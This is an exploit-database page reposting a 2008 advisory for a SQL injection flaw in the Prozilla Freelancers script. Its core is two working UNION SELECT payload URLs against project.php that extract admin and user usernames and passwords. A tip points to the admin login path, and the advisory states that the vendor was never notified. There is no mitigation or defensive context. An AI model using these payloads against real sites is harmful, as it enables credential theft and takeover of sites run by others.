[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Prozilla Freelancers (project) Remote SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2836
Category
web applications
Date add
06-04-2008
Platform
unsorted
=================================================================
Prozilla Freelancers (project) Remote SQL Injection Vulnerability
=================================================================




--==+================================================================================+==--
--==+		     Prozilla Freelancers SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 7 April 2008
Script Download: http://prozilla.net
DORK: N/A

Vendor Has Not Been Notified!


DESCRIPTION: 
Prozilla freelancers is vulnerable due to a insecure mysql query.
this allows the remote attacker to pull admin/user credntials from database.
and possibly gain shell.


SQL Injection:
ADMIN: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/admin/*
USERS: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/users/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at /siteadmin/




#  0day.today [2024-09-29]  #